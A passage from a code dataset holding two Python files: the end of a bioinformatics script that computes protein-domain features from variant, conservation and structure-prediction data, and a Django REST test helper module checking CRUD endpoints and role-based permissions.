1s\n    # in the absence of any spider 2nd struct information, while at the same time returning all the\n    # *_prob_avg/std keys as nans\n    # We follow the same logic here by setting the major allele (which would normally be one of H/E/C) to HEC\n    # in case of missing information.\n    # Note also that we cannot use np.argmax since it only returns a 'single' index\n    maj_allele = 'HEC' if len(counts) == 0 else values[np.where(counts == np.max(counts))]\n\n    return {\n        'helix_prob_avg': np.nanmean(spider_dict[\"spider2-helix_prob\"]),  # helix prob. mean\n        'helix_prob_std': np.nanstd(spider_dict[\"spider2-helix_prob\"]),  # helix prob. std\n        'sheet_prob_avg': np.nanmean(spider_dict[\"spider2-sheet_prob\"]),  # sheet prob. mean\n        'sheet_prob_std': np.nanstd(spider_dict[\"spider2-sheet_prob\"]),  # sheet prob. std\n        'turn_prob_avg': np.nanmean(spider_dict[\"spider2-turn_prob\"]),  # turn prob. mean\n        'turn_prob_std': np.nanstd(spider_dict[\"spider2-turn_prob\"]),  # turn prob. 
std\n        'spd_helix_is_majority': int('H' in maj_allele),  # 0/1\n        'spd_sheet_is_majority': int('E' in maj_allele),  # 0/1\n        'spd_turn_is_majority': int('C' in maj_allele)  # 0/1\n    }\n\n\ndef spider_half_sphere_exposure_pred(spider_dict):\n    return {\n        'hsa2_HSE-up_avg': np.mean(spider_dict[\"spider2-hsa2_HSEu\"]),\n        'hsa2_HSE-up_std': np.std(spider_dict[\"spider2-hsa2_HSEu\"]),\n        'hsa2_HSE-down_avg': np.mean(spider_dict[\"spider2-hsa2_HSEd\"]),\n        'hsa2_HSE-down_std': np.std(spider_dict[\"spider2-hsa2_HSEd\"]),\n        'hsb2_HSE-up_avg': np.mean(spider_dict[\"spider2-hsb2_HSEu\"]),\n        'hsb2_HSE-up_std': np.std(spider_dict[\"spider2-hsb2_HSEu\"]),\n        'hsb2_HSE-down_avg': np.mean(spider_dict[\"spider2-hsb2_HSEd\"]),\n        'hsb2_HSE-down_std': np.std(spider_dict[\"spider2-hsb2_HSEd\"])\n    }\n\n\ndef whole_domain_conservation(states_dict):\n    # phastCons and PhyloP whole-domain mean/std\n    return {\n        'whole_domain_phastCons_avg': states_dict[\"_phastCons_mean\"],\n        'whole_domain_phastCons_std': states_dict[\"_phastCons_std\"],\n        'whole_domain_phyloP_avg': states_dict[\"_phyloP_mean\"],\n        'whole_domain_phyloP_std': states_dict[\"_phyloP_std\"]\n    }\n\n\ndef domain_location_features(state, max_state):\n\n    # ===Feature: the location in the domain: beginning/middle/end===#\n    location_list = [0, 0, 0]\n    BEGIN_POS = 0\n    MIDDLE_POS = 1\n    END_POS = 2\n    domain_location_bins = np.histogram(np.arange(1, max_state), bins=3)[1]\n    if state < domain_location_bins[1]:\n        location_list[BEGIN_POS] = 1\n    elif state > domain_location_bins[2]:\n        location_list[END_POS] = 1\n    else:\n        location_list[MIDDLE_POS] = 1\n\n    return {\n        'domain_pos': state,\n        'domain_length': max_state,\n        'domain_pos_location_begin': location_list[0],\n        'domain_pos_location_middle': location_list[1],\n        'domain_pos_location_end': location_list[2]\n    }\n\n\ndef protein_location_features(protein_pos_list, protein_len_list):\n    # Avg. 
protein total length, counts of the location in the protein: beginning/middle/end\n location_list = [0, 0, 0]\n BEGIN_POS = 0\n MIDDLE_POS = 1\n END_POS = 2\n for i in range(len(protein_pos_list)):\n prot_location_bins = np.histogram(np.arange(1, protein_len_list[i]), bins=3)[1]\n if protein_pos_list[i] < prot_location_bins[1]:\n location_list[BEGIN_POS] += 1\n elif protein_pos_list[i] > prot_location_bins[2]:\n location_list[END_POS] += 1\n else:\n location_list[MIDDLE_POS] += 1\n\n # Normalize to ratios\n location_list_norm = np.array(location_list) / sum(location_list)\n\n return {\n 'prot_avg_length': np.mean(protein_len_list),\n 'prot_pos_location_begin': location_list_norm[0],\n 'prot_pos_location_middle': location_list_norm[1],\n 'prot_pos_location_end': location_list_norm[2]\n }\n\n\nif __name__ == '__main__':\n\n with open(os.path.join(os.path.dirname(data.__file__), 'BLOSUM62_dict.pik'), 'rb') as f:\n blosum62_dict = pickle.load(f)\n\n with open(os.path.join(os.path.dirname(data.__file__), 'PAM40_dict.pik'), 'rb') as f:\n pam40_dict = pickle.load(f)\n\n with open(PROB_DICT, 'rb') as f:\n prob_dict = pickle.load(f)\n\n features_list = []\n an_str = POPULATIONS_ANS\n ac_str = POPULATIONS_ACS\n\n for pik in glob.glob(f'{HMM_STATES_FOLDER}/*.pik'):\n domain = os.path.splitext(os.path.basename(pik))[0]\n\n\n hmm_prob_dict = prob_dict[domain]\n\n with open(pik, 'rb') as handle:\n states_dict = pickle.load(handle)\n\n # Create af_adj flat dict\n states_af_adj_dict = defaultdict(list)\n for state in states_dict.keys():\n if str(state).startswith('_'): continue\n for d in states_dict[state]:\n states_af_adj_dict[state].append(d[\"af_adj\"])\n\n # scale the af_dict\n states_MAF_adj_dict_scaled = defaultdict(list)\n for state in states_dict.keys():\n if str(state).startswith('_'): continue\n state_len = len(states_dict[state])\n for d in states_dict[state]:\n states_MAF_adj_dict_scaled[state].append(float(d[\"af_adj\"] / state_len))\n\n # Create a dict of conserved states\n con_states_dict = {}\n con_threshold = 0.5\n for state in hmm_prob_dict:\n prob_list = hmm_prob_dict[state]\n for i in range(len(prob_list)):\n p = prob_list[i]\n if p > con_threshold:\n major_allele = pfam_aa_order[i]\n con_states_dict[state] = major_allele\n\n # Adding states features\n for state in states_dict:\n\n features_dict = {}\n\n if str(state).startswith('_'): continue\n state_id = domain + \"_\" + str(state)\n\n # Init counters & paramters\n maf_list = []\n sites_aa_alter_num = 0\n sites_snp_alter_num = 0\n sites_aa_num = len(states_dict[state])\n sites_snp_num = 3 * sites_aa_num\n sites_poly_aa_num = 0 # The number of different aa in all the altered sites (most are 1)\n sites_poly_aa_several = 0\n\n # Rare-poly-counters\n rare_5_num = 0\n rare_05_num = 0\n rare_005_num = 0\n\n # Conservation params\n phastCons_dict = defaultdict(list)\n phyloP_dict = defaultdict(list)\n jsd100way_list = []\n\n # SPIDER params\n spider_dict = defaultdict(list)\n\n # BLOSUM62_params\n blosum62_list = []\n weigted_blosum62_list = []\n\n # PAM40_params\n pam40_list = []\n weigted_pam40_list = []\n\n # dn/ds counters and variables\n ref_seq = \"\"\n Nd = 0\n Sd = 0\n\n # SIFT params\n sift_scores_list = []\n weighted_sift_scores_list = []\n\n # PolyPhen params\n polyphen_scores_list = []\n weighted_polyphen_scores_list = []\n polyphen_pred_list = []\n\n # clinVar params\n clinsig_list = []\n clinsig_af = []\n\n # Major allele params\n aa_ref_hist = [0] * len(AMINO_ACIDS)\n\n # Substitution params\n aa_alt_hist = [0] * 
len(AMINO_ACIDS)\n aa_alt_prob = [0] * len(AMINO_ACIDS)\n aa_alt_prob_avg = [0] * len(AMINO_ACIDS)\n ref_alt_pairs = []\n\n # protein position params\n protein_pos_list = []\n protein_len_list = []\n\n # Populations variables\n ac_sum = [0] * len(ac_str)\n ac_sum_syn = [0] * len(ac_str)\n ac_sum_nonsyn = [0] * len(ac_str)\n an_list = [[] for i in range(len(an_str))]\n pop_maf_list = [[] for i in range(len(an_str))]\n pop_maf_syn_list = [[] for i in range(len(an_str))]\n pop_maf_nonsyn_list = [[] for i in range(len(an_str))]\n\n # Iterating the state dict to get properties\n for d in states_dict[state]:\n\n # a list of all maf per instance\n maf_list.append(d[\"af_adj\"])\n\n # Creating a position pseudo-ref sequence\n ref_codon = d[\"bp_ref\"]\n ref_seq = ref_seq + ref_codon\n\n # Calculating frequency-based N/S\n bp_af_adj_dict = d[\"bp_af_adj_dict\"]\n for alt_codon in bp_af_adj_dict.keys():\n alt_aa = codon_table[alt_codon]\n # syn\n if alt_aa == d[\"aa_ref\"]:\n Sd += bp_af_adj_dict[alt_codon]\n # Non-syn\n else:\n Nd += bp_af_adj_dict[alt_codon]\n\n # Major allele parameters\n aa_ref = d[\"aa_ref\"]\n aa_ref_pos = AMINO_ACIDS.index(aa_ref)\n aa_ref_hist[aa_ref_pos] += 1\n\n # Conservation scores\n phastCons_curr_list = d[\"phastCons\"]\n if len(phastCons_curr_list) > 0:\n phastCons_dict[1].append(phastCons_curr_list[0])\n if len(phastCons_curr_list) > 1:\n phastCons_dict[2].append(phastCons_curr_list[1])\n else:\n phastCons_dict[2].append(np.nan)\n if len(phastCons_curr_list) > 2:\n phastCons_dict[3].append(phastCons_curr_list[2])\n else:\n phastCons_dict[3].append(np.nan)\n\n phyloP_curr_list = d[\"phyloP\"]\n if len(phyloP_curr_list) > 0:\n phyloP_dict[1].append(phyloP_curr_list[0])\n if len(phyloP_curr_list) > 1:\n phyloP_dict[2].append(phyloP_curr_list[1])\n else:\n phyloP_dict[2].append(np.nan)\n if len(phyloP_curr_list) > 2:\n phyloP_dict[3].append(phyloP_curr_list[2])\n else:\n phyloP_dict[3].append(np.nan)\n\n jsd100way_list.append(d[\"100-way-BLOSUM_JSD\"])\n\n # SPIDER parameters (add only if exist)\n if \"spider2-2nd_struct\" in d:\n spider_dict[\"spider2-2nd_struct\"].append(d[\"spider2-2nd_struct\"])\n spider_dict[\"spider2-helix_prob\"].append(float(d[\"spider2-helix_prob\"]))\n spider_dict[\"spider2-sheet_prob\"].append(float(d[\"spider2-sheet_prob\"]))\n spider_dict[\"spider2-turn_prob\"].append(float(d[\"spider2-turn_prob\"]))\n spider_dict[\"spider2-angle_Phi\"].append(float(d[\"spider2-angle_Phi\"]))\n spider_dict[\"spider2-angle_Psi\"].append(float(d[\"spider2-angle_Psi\"]))\n spider_dict[\"spider2-angle_tau\"].append(float(d[\"spider2-angle_tau\"]))\n spider_dict[\"spider2-angle_theta\"].append(float(d[\"spider2-angle_theta\"]))\n spider_dict[\"spider2-ASA\"].append(float(d[\"spider2-ASA\"]))\n spider_dict[\"spider2-hsa2_HSEu\"].append(float(d[\"spider2-hsa2_HSEu\"]))\n spider_dict[\"spider2-hsa2_HSEd\"].append(float(d[\"spider2-hsa2_HSEd\"]))\n spider_dict[\"spider2-hsb2_HSEu\"].append(float(d[\"spider2-hsb2_HSEu\"]))\n spider_dict[\"spider2-hsb2_HSEd\"].append(float(d[\"spider2-hsb2_HSEd\"]))\n spider_dict[\"spider2-hsa2_CN\"].append(float(d[\"spider2-hsa2_CN\"]))\n spider_dict[\"spider2-hsb2_CN\"].append(float(d[\"spider2-hsb2_CN\"]))\n\n protein_pos_list.append(d[\"prot_pos\"])\n protein_len_list.append(d[\"prot_len\"])\n\n if d[\"af_adj\"] > 0:\n sites_aa_alter_num += 1\n sites_snp_alter_num += len(d[\"an_adj\"])\n\n # Number of different polymorphisms at this site\n site_poly_num = len(d[\"alterations_af_adj_dict\"].keys())\n sites_poly_aa_num += 
site_poly_num\n if site_poly_num > 1:\n sites_poly_aa_several += 1\n\n # Rare poly features\n\n for alt_codon in bp_af_adj_dict.keys():\n # Add to counters only nonsyn SNPs\n if codon_table[alt_codon] != codon_table[ref_codon]:\n if bp_af_adj_dict[alt_codon] < MAFT_005:\n rare_005_num += 1\n rare_05_num += 1\n rare_5_num += 1\n elif bp_af_adj_dict[alt_codon] < MAFT_05:\n rare_05_num += 1\n rare_5_num += 1\n elif bp_af_adj_dict[alt_codon] < MAFT_5:\n rare_5_num += 1\n\n # Alt, BLOSUM62 and PAM40 features\n ref = d[\"aa_ref\"]\n for alt in d[\"alterations_af_adj_dict\"].keys():\n af_adj = np.mean(d[\"alterations_af_adj_dict\"][alt])\n # BLOSUM\n blosum_val = blosum62_dict[ref][alt]\n blosum62_list.append(blosum_val)\n weigted_blosum62_list.append(blosum_val * af_adj)\n # PAM\n pam_val = pam40_dict[ref][alt]\n pam40_list.append(pam_val)\n weigted_pam40_list.append(pam_val * af_adj)\n # Alt aa counts\n aa_alt_pos = AMINO_ACIDS.index(alt)\n aa_alt_hist[aa_alt_pos] += 1\n # Alt aa prob.\n aa_alt_prob[aa_alt_pos] += af_adj\n # ref-alt pairs\n ref_alt_pairs.append((ref, alt, af_adj))\n\n # SIFT\n sift_list = d[\"SIFT\"]\n for i in range(len(sift_list)):\n s = sift_list[i]\n if s != \"\":\n try:\n s_af = bp_af_adj_dict[d[\"bp_list\"][i]]\n except:\n # The major allele was replaced, no score available for the correct substitution\n continue\n sift_score = float(s[s.find(\"(\") + 1:s.find(\")\")])\n sift_scores_list.append(sift_score)\n weighted_sift_scores_list.append(sift_score * s_af)\n\n # PolyPhen\n polyphen_list = d[\"PolyPhen\"]\n for i in range(len(polyphen_list)):\n s = polyphen_list[i]\n if s != \"\":\n try:\n s_af = bp_af_adj_dict[d[\"bp_list\"][i]]\n except:\n # The major allele was replaced, no score available for the correct substitution\n continue\n polyphen_score = float(s[s.find(\"(\") + 1:s.find(\")\")])\n polyphen_scores_list.append(polyphen_score)\n weighted_polyphen_scores_list.append(polyphen_score * s_af)\n polyphen_pred_list.append(s[:s.find(\"(\")])\n\n # clinVar\n curr_clinsig_list = d[\"clin_sig\"]\n for i in range(len(curr_clinsig_list)):\n s = curr_clinsig_list[i]\n if s != \"\":\n try:\n s_af = bp_af_adj_dict[d[\"bp_list\"][i]]\n except:\n # The major allele was replaced, no score available for the correct substitution\n continue\n clinsig_list.append(s)\n clinsig_af.append(s_af)\n\n # Saving indices of syn and non-syn bps\n syn_idx = []\n nonsyn_idx = []\n for i in range(len(d[\"bp_list\"])):\n ref_aa = d[\"aa_ref\"]\n alt_bp = d[\"bp_list\"][i]\n alt_aa = codon_table[alt_bp.upper()]\n if alt_aa == ref_aa:\n syn_idx.append(i)\n else:\n nonsyn_idx.append(i)\n\n # Summing the AC per population\n for i in range(len(ac_str)):\n ac = ac_str[i]\n ac_sum[i] += sum(d[ac])\n # Summing syn and non-syn separately\n ac_sum_syn[i] += sum(np.array(d[ac])[syn_idx])\n ac_sum_nonsyn[i] += sum(np.array(d[ac])[nonsyn_idx])\n\n # Averaging the AN per population, to do that, gathering all an to a list\n for i in range(len(an_str)):\n an = an_str[i]\n (an_list[i]).extend(d[an])\n\n # Averaging the MAF per population, to do that: gathering all maf!=0 to a list\n for i in range(len(an_str)):\n ac = ac_str[i]\n an = an_str[i]\n for j in range(len(d[ac])):\n if d[an][j] != 0:\n pop_maf = d[ac][j] / float(d[an][j])\n if pop_maf != 0:\n if j in syn_idx:\n pop_maf_syn_list[i].append(pop_maf)\n else:\n pop_maf_nonsyn_list[i].append(pop_maf)\n pop_maf_list[i].append(pop_maf)\n\n features_dict['state_id'] = state_id\n features_dict['domain_name'] = domain\n\n for i in range(len(AMINO_ACIDS)):\n if 
aa_alt_prob[i] > 0:\n aa_alt_prob_avg[i] = aa_alt_prob[i] / float(aa_alt_hist[i])\n\n features = [\n\n ExAC_MAF_features(sites_aa_num, sites_aa_alter_num, maf_list),\n ExAC_population_features(pop_maf_list, pop_maf_syn_list, pop_maf_nonsyn_list),\n ExAC_count_features(sites_aa_num, sites_aa_alter_num, sites_snp_num, sites_snp_alter_num),\n ExAC_rareSNP_features(sites_snp_alter_num, rare_5_num, rare_05_num, rare_005_num),\n\n conservation_features(phastCons_dict, phyloP_dict),\n\n sub_matrix_features(blosum62_list, weigted_blosum62_list, 'blosum'),\n sub_matrix_features(pam40_list, weigted_pam40_list, 'pam'),\n\n pseudo_dNdS_features(ref_seq, Nd, Sd),\n pfam_emission_prob_features(hmm_prob_dict, state),\n pfam_conserved_state_feature(state, con_states_dict),\n\n SIFT_features(sift_scores_list, weighted_sift_scores_list),\n PolyPhen_features(polyphen_scores_list, polyphen_pred_list, weighted_polyphen_scores_list),\n ClinVar_scores(clinsig_list, clinsig_af),\n\n entropy_features(maf_list),\n instance_individuals_100way_change_features(maf_list, aa_ref_hist, jsd100way_list),\n\n aa_identity_features(aa_ref_hist, \"aa_ref\"),\n major_allele_charge(aa_ref_hist),\n major_allele_hydrophobicity(aa_ref_hist),\n major_allele_volume(aa_ref_hist),\n major_allele_functional_group(aa_ref_hist),\n major_allele_propensity(aa_ref_hist),\n major_allele_h_bonds(aa_ref_hist),\n\n aa_identity_features(aa_alt_hist, \"aa_alt_cnt\"),\n aa_identity_features(aa_alt_prob_avg, \"aa_alt_avg_freq\"),\n\n sub_diff_hydrophobicity(ref_alt_pairs),\n sub_diff_volume(ref_alt_pairs),\n sub_diff_functional_group(ref_alt_pairs),\n sub_diff_propensity(ref_alt_pairs),\n sub_diff_h_bonds(ref_alt_pairs),\n\n spider_solvent_acc_pred(spider_dict),\n spider_contact_number_pred(spider_dict),\n spider_angles_pred(spider_dict),\n spider_struct_pred(spider_dict),\n spider_half_sphere_exposure_pred(spider_dict),\n\n whole_domain_conservation(states_dict),\n domain_location_features(state, max([k for k in states_dict if isinstance(k, int)])),\n protein_location_features(protein_pos_list, protein_len_list)\n\n ]\n\n for feature in features:\n features_dict.update(feature)\n features_list.append(features_dict)\n\n domains_features_df = pd.DataFrame(features_list)\n domains_features_df = domains_features_df.set_index('state_id')\n domains_features_df = domains_features_df.sort_index()\n\n to_lowercase_fields = 'maf_nonsyn_AMR maf_syn_SAS maf_NFE maf_nonsyn_EAS maf_AMR maf_nonsyn_FIN maf_syn_AFR maf_syn_EAS maf_syn_OTH maf_nonsyn_SAS maf_nonsyn_AFR maf_syn_FIN maf_FIN maf_nonsyn_NFE maf_EAS maf_AFR maf_nonsyn_OTH maf_SAS maf_OTH maf_syn_AMR maf_syn_NFE'.split()\n domains_features_df = domains_features_df.rename(columns={x: x.lower() for x in to_lowercase_fields})\n domains_features_df.to_csv(OUTPUT_CSV, sep='\\t', index_label='')\n\n","repo_name":"Singh-Lab/dSPRINT","sub_path":"scripts/9.Features_exploration/positions_features.py","file_name":"positions_features.py","file_ext":"py","file_size_in_byte":53939,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"4240799273","text":"import json\nfrom copy import deepcopy\n\nfrom django.core.files.uploadedfile import InMemoryUploadedFile\nfrom django.test import TestCase\nfrom rest_framework.test import APIClient\n\nfrom base.models import User\nfrom base.test_settings import backend_url, roles\nfrom util.data_generators import createUser\n\n\ndef get_authenticated_client(role=\"admin\"):\n user = createUser(role)\n client = APIClient()\n 
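# attach the user to the test client directly, skipping the login endpoint\n    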
client.force_authenticate(user=user)\n    return client\n\n\ndef errorMessage(name, expected, got):\n    return f\"[TEST FAILED]\\tname: {name}\\tgot: {got} (type: {type(got)})\\texpected: {expected} (type: {type(expected)})\"\n\n\nclass BaseTest(TestCase):\n    data1 = None\n    data2 = None\n\n    def setUp(self):\n        self.client = get_authenticated_client()\n\n    def empty_list(self, url):\n        resp = self.client.get(backend_url + \"/\" + url + \"all/\", follow=True)\n        assert resp.status_code == 200, errorMessage(\"empty_list\", 200, resp.status_code)\n        data = [resp.data[e] for e in resp.data]\n        assert len(data) == 0, errorMessage(\"empty_list\", 0, len(data))\n\n    def insert(self, url, excluded=None):\n        if excluded is None:\n            excluded = []\n        assert self.data1 is not None, \"no data found\"\n        data = self.data1\n        if \"region\" in self.data1:\n            data = json.dumps(self.data1)\n            resp = self.client.post(backend_url + \"/\" + url, data, content_type=\"application/json\", follow=True)\n        else:\n            resp = self.client.post(backend_url + \"/\" + url, data, follow=True)\n        assert resp.status_code == 201, errorMessage(\"insert\", 201, resp.status_code)\n        for key in self.data1:\n            if key in excluded:\n                continue\n            assert key in resp.data, errorMessage(\"insert\", key, None)\n            if type(self.data1[key]) == InMemoryUploadedFile:\n                continue\n            assert self.data1[key] == resp.data[key], errorMessage(\n                f\"insert (key:{key})\", self.data1[key], resp.data[key]\n            )\n        assert \"id\" in resp.data, errorMessage(\"insert\", \"id\", None)\n\n    def insert_empty(self, url):\n        resp = self.client.post(backend_url + \"/\" + url, {}, follow=True)\n        print(resp)\n        assert resp.status_code == 400, errorMessage(\"insert_empty\", 400, resp.status_code)\n\n    def insert_dupe(self, url, special=None):\n        assert self.data1 is not None, \"no data found\"\n        if \"region\" in self.data1:\n            data = json.dumps(self.data1)\n            _ = self.client.post(backend_url + \"/\" + url, data, content_type=\"application/json\", follow=True)\n        else:\n            _ = self.client.post(backend_url + \"/\" + url, self.data1, follow=True)\n        # _ = self.client.post(backend_url + \"/\" + url, self.data1, follow=True)\n        if \"region\" in self.data1:\n            data = json.dumps(self.data1)\n            response = self.client.post(backend_url + \"/\" + url, data, content_type=\"application/json\", follow=True)\n        else:\n            response = self.client.post(backend_url + \"/\" + url, self.data1, follow=True)\n\n        # response = self.client.post(backend_url + \"/\" + url, self.data1, follow=True)\n        if special is None:\n            assert response.status_code == 400, errorMessage(\"insert_dupe\", 400, response.status_code)\n        else:\n            assert response.status_code == special, errorMessage(\"insert_dupe\", special, response.status_code)\n\n    def get(self, url, data):\n        response2 = self.client.get(backend_url + \"/\" + url, follow=True)\n        assert response2.status_code == 200, errorMessage(\"get\", 200, response2.status_code)\n        for key in data:\n            # all data should be present\n            assert key in response2.data, errorMessage(\"get\", key, None)\n            if type(data[key]) == InMemoryUploadedFile:\n                continue\n            assert data[key] == response2.data[key], errorMessage(f\"get (key:{key})\", data[key], response2.data[key])\n        # an ID should be present\n        assert \"id\" in response2.data, errorMessage(\"get\", \"id\", None)\n\n    def get_non_existent(self, url):\n        resp = self.client.get(backend_url + \"/\" + url + \"1234567\", follow=True)\n        assert resp.status_code == 404, errorMessage(\"get_non_existent\", 404, resp.status_code)\n\n    def patch(self, url, special=None, excluded=None):\n        if 
excluded is None:\n excluded = []\n if special is None:\n special = []\n assert self.data1 is not None, \"no data found\"\n if \"region\" in self.data1:\n data = json.dumps(self.data1)\n response2 = self.client.patch(backend_url + \"/\" + url, data, content_type=\"application/json\", follow=True)\n else:\n response2 = self.client.patch(backend_url + \"/\" + url, self.data1, follow=True)\n # response2 = self.client.patch(backend_url + \"/\" + url, self.data1, follow=True)\n assert response2.status_code == 200, errorMessage(\"patch\", 200, response2.status_code)\n response3 = self.client.get(backend_url + \"/\" + url, follow=True)\n checked = []\n for key, value in special:\n if key in excluded:\n continue\n assert key in response3.data, errorMessage(\"patch\", key, None)\n assert value == response3.data[key], errorMessage(\"patch\", value, response3.data[key])\n checked.append(key)\n for key in self.data1:\n if key in checked or key in excluded:\n continue\n # all data should be present\n assert key in response3.data, errorMessage(\"patch\", key, None)\n if type(self.data1[key]) == InMemoryUploadedFile:\n continue\n assert self.data1[key] == response3.data[key], errorMessage(\"patch\", self.data1[key], response3.data[key])\n assert response3.status_code == 200, errorMessage(\"patch\", 200, response3.status_code)\n assert \"id\" in response3.data, errorMessage(\"patch\", \"id\", None)\n\n def patch_invalid(self, url):\n if \"region\" in self.data1:\n data = json.dumps(self.data1)\n response2 = self.client.patch(\n backend_url + \"/\" + url + \"123434687658/\", data, content_type=\"application/json\", follow=True\n )\n else:\n response2 = self.client.patch(backend_url + \"/\" + url + \"123434687658/\", self.data1, follow=True)\n # response2 = self.client.patch(backend_url + \"/\" + url + \"123434687658/\", self.data1, follow=True)\n assert response2.status_code == 404, errorMessage(\"patch_invalid\", 404, response2.status_code)\n\n def patch_error(self, url, special=None):\n assert self.data1 is not None, \"no data found\"\n assert self.data2 is not None, \"no data found\"\n # taking a deepcopy to fix file issues when uploading pictures\n backup = deepcopy(self.data2)\n if \"region\" in self.data1:\n data = json.dumps(self.data1)\n response1 = self.client.post(backend_url + \"/\" + url, data, content_type=\"application/json\", follow=True)\n else:\n response1 = self.client.post(backend_url + \"/\" + url, self.data1, follow=True)\n\n # response1 = self.client.post(backend_url + \"/\" + url, self.data1, follow=True)\n if \"region\" in self.data2:\n data = json.dumps(self.data2)\n _ = self.client.post(backend_url + \"/\" + url, data, content_type=\"application/json\", follow=True)\n else:\n _ = self.client.post(backend_url + \"/\" + url, self.data2, follow=True)\n\n # _ = self.client.post(backend_url + \"/\" + url, self.data2, follow=True)\n assert response1.status_code == 201, errorMessage(\"patch_error\", 201, response1.status_code)\n result_id = response1.data[\"id\"]\n if \"region\" in backup:\n data = json.dumps(backup)\n response2 = self.client.patch(\n backend_url + \"/\" + url + f\"{result_id}\", data, content_type=\"application/json\", follow=True\n )\n else:\n response2 = self.client.patch(backend_url + \"/\" + url + f\"{result_id}\", backup, follow=True)\n\n # response2 = self.client.patch(backend_url + \"/\" + url + f\"{result_id}/\", backup, follow=True)\n if special is None:\n assert response2.status_code == 400, errorMessage(\"patch_error\", 400, response2.status_code)\n else:\n 
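# a caller-supplied status code overrides the default 400 expectation\n            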
assert response2.status_code == special, errorMessage(\"patch_error\", special, response2.status_code)\n\n    def remove(self, url, special=None):\n        response2 = self.client.delete(backend_url + \"/\" + url, follow=True)\n        assert response2.status_code == 204, errorMessage(\"remove\", 204, response2.status_code)\n        response3 = self.client.get(backend_url + \"/\" + url, follow=True)\n        if special is not None:\n            assert response3.status_code == special, errorMessage(\"remove\", special, response3.status_code)\n        else:\n            assert response3.status_code == 404, errorMessage(\"remove\", 404, response3.status_code)\n\n    def remove_invalid(self, url):\n        response2 = self.client.delete(backend_url + \"/\" + url + \"123434687658\", follow=True)\n        assert response2.status_code == 404, errorMessage(\"remove_invalid\", 404, response2.status_code)\n\n\ndef auth_error_message(name, role, got, expected):\n    return f\"[TEST FAILED]\\tname: {name}\\trole: {role}\\tcode: {got} (expected {expected})\"\n\n\nclass BaseAuthTest(TestCase):\n    data1 = None\n\n    def list_view(self, url, codes):\n        for role in roles:\n            client = get_authenticated_client(role)\n            resp = client.get(backend_url + \"/\" + url + \"all/\")\n            assert resp.status_code == codes[role], auth_error_message(\"list_view\", role, resp.status_code, codes[role])\n\n    def insert_view(self, url, codes, special=None):\n        if special is None:\n            special = []\n        adminClient = get_authenticated_client()\n        for role in roles:\n            client = get_authenticated_client(role)\n            if \"region\" in self.data1:\n                data = json.dumps(self.data1)\n                resp = client.post(backend_url + \"/\" + url, data, content_type=\"application/json\", follow=True)\n            else:\n                resp = client.post(backend_url + \"/\" + url, self.data1, follow=True)\n\n            # resp = client.post(backend_url + \"/\" + url, self.data1, follow=True)\n            assert resp.status_code == codes[role], auth_error_message(\n                \"insert_view\", role, resp.status_code, codes[role]\n            )\n            if resp.status_code == 201:\n                result_id = resp.data[\"id\"]\n                _ = adminClient.delete(backend_url + \"/\" + url + str(result_id))\n        for user_id, result in special:\n            user = User.objects.filter(id=user_id).first()  # there should only be 1\n            if not user:\n                raise ValueError(\"user not valid\")\n            client = APIClient()\n            client.force_authenticate(user=user)\n            # response2 = client.post(backend_url + \"/\" + url, self.data1, follow=True)\n            if \"region\" in self.data1:\n                data = json.dumps(self.data1)\n                response2 = client.post(backend_url + \"/\" + url, data, content_type=\"application/json\", follow=True)\n            else:\n                response2 = client.post(backend_url + \"/\" + url, self.data1, follow=True)\n            assert response2.status_code == result, auth_error_message(\n                \"insert_view (special case)\", user.role.name, response2.status_code, result\n            )\n            if response2.status_code == 201:\n                result_id = response2.data[\"id\"]\n                _ = adminClient.delete(backend_url + \"/\" + url + str(result_id))\n\n    def get_view(self, url, codes, special=None):\n        if special is None:\n            special = []\n        for role in roles:\n            client = get_authenticated_client(role)\n            response2 = client.get(backend_url + \"/\" + url, follow=True)\n            assert response2.status_code == codes[role], auth_error_message(\n                \"get_view\", role, response2.status_code, codes[role]\n            )\n        for user_id, result in special:\n            user = User.objects.filter(id=user_id).first()  # there should only be 1\n            if not user:\n                raise ValueError(\"user not valid\")\n            client = APIClient()\n            client.force_authenticate(user=user)\n            response2 = client.get(backend_url + \"/\" + url, follow=True)\n            
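# each special-case user must receive exactly the status code paired with it\n            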
assert response2.status_code == result, auth_error_message(\n                \"get_view (special case)\", user.role.name, response2.status_code, result\n            )\n\n    def patch_view(self, url, codes, special=None):\n        if special is None:\n            special = []\n        for role in roles:\n            client = get_authenticated_client(role)\n            if \"region\" in self.data1:\n                data = json.dumps(self.data1)\n                response2 = client.patch(backend_url + \"/\" + url, data, content_type=\"application/json\", follow=True)\n            else:\n                response2 = client.patch(backend_url + \"/\" + url, self.data1, follow=True)\n            # response2 = client.patch(backend_url + \"/\" + url, self.data1, follow=True)\n            assert response2.status_code == codes[role], auth_error_message(\n                \"patch_view\", role, response2.status_code, codes[role]\n            )\n        for user_id, result in special:\n            user = User.objects.filter(id=user_id).first()  # there should only be 1\n            if not user:\n                raise ValueError(\"user not valid\")\n            client = APIClient()\n            client.force_authenticate(user=user)\n            if \"region\" in self.data1:\n                data = json.dumps(self.data1)\n                response2 = client.patch(backend_url + \"/\" + url, data, content_type=\"application/json\", follow=True)\n            else:\n                response2 = client.patch(backend_url + \"/\" + url, self.data1, follow=True)\n            # response2 = client.patch(backend_url + \"/\" + url, self.data1, follow=True)\n            assert response2.status_code == result, auth_error_message(\n                \"patch_view (special case)\", user.role.name, response2.status_code, result\n            )\n\n    def remove_view(self, url, codes, create):\n        exists = False\n        instance_id = -1\n        for role in roles:\n            if not exists:\n                instance_id = create()\n            # try to remove as `role`\n            client = get_authenticated_client(role)\n            response2 = client.delete(backend_url + \"/\" + url + f\"{instance_id}/\", follow=True)\n            assert response2.status_code == codes[role], auth_error_message(\n                \"remove_view\", role, response2.status_code, codes[role]\n            )\n            exists = codes[role] != 204\n","repo_name":"SELab-2/Dr-Trottoir-4","sub_path":"backend/util/test_tools.py","file_name":"test_tools.py","file_ext":"py","file_size_in_byte":14850,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"}
